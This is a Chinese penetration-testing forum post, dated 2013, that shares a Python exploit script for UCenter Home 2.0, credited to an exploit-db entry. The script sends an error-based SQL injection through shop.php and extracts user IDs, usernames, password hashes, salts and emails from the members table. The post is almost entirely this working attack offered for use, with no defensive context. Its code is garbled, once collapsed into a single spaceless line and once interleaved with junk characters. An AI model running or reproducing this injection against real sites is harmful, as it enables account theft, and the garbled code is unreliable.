找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
返回列表 发新帖
查看: 2210|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
; u0 Q8 |" Z2 z) o' A$ L& X* g) t  Q
' f3 \! o3 I' H6 _/ B9 ^: [; C2 l" X; z
#!/usr/bin/env python  4 L0 G- H; s7 m$ Q. f

/ I( U) b5 p2 t6 @  O2 i) Kimport sys  . @6 l& O0 H' I+ A! k
import urllib2  
2 k5 L# o. U1 ]6 P: O. Mimport re  
' o2 y3 L; T, z% c5 b0 A9 G, u
( T" `( I  z: I. v8 ?8 }def info():  0 t2 S5 i6 D- V- K- W' ^
    print 'From:http://www.exploit-db.com/exploits/14997/' 4 |: T, j' M/ @* g6 j0 K
    print 'http://www.hake.cc/Web_loudong/'
. \7 J* T) _' N    print 'changed:qiaoy'  - ?. r5 T0 h4 b# E6 T+ y
    print 'exp:'  4 Z, z- h0 _. s' n
    print ' ./UCenter_Home_2.0.py site'  / ]3 X- u: [: W/ V
, o3 ^) \- l# l$ s( R! R2 q8 s) ~
def main():  
8 H5 h! a% K. M- `& i    if len(sys.argv) != 2:  2 |1 z1 o: {8 t% H) u$ R, y
        info()  
1 }. K' O5 n! p; W    else:  
( f0 C$ s4 M# y" \        site = sys.argv[1]  ; {8 {# \" G. ^- ?: ^
        if site[0:7] == 'http://':  
& c0 D9 W6 L# r3 w5 J            sitesite =site  2 k7 v) S+ ~0 M  B
        elif site[0:8] == 'https://':  
' O. r5 E/ R% i2 `7 H1 l/ r! w            sitesite = site  ) n4 a! Q/ @  G! ~4 `. x
        else:  ( R8 `# i7 Q6 t1 o( H1 w' P3 m
            site = 'http://'+site  
- C) m, L' ?7 J$ t        try:  
' f2 @; R* ]' U0 }" v% [            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  8 y3 f2 K  Y4 ]9 G/ @
            Value = urllib2.urlopen(url).read()  2 X4 k% T% j1 B' K  p
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  % H5 B4 L% l" x* I0 y) K
            hacked = Msg.split(':')  1 h0 O' ~5 f9 `' {
            print 'Name:    '+hacked[1]  
# u2 M# J% g; b4 ^6 Z: k            print 'Passwd:  '+hacked[2]  " b! Y. \8 n9 i; u- ~5 ]
            print 'salt:    '+hacked[3]  
) k3 ^0 Z7 W, f; t9 v' `            print 'email:   '+hacked[4]  
% b- F' z1 \7 u9 W        except:  
/ F, {# p6 I1 }) E! U( q2 o* H# O( h            print 'Sorry,I can\'t work............'  8 `4 g# }$ `: |; ?2 T/ B! b

$ G2 O  x' `( D/ uif __name__ == '__main__':  " Y7 s: Q% n; o. P
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表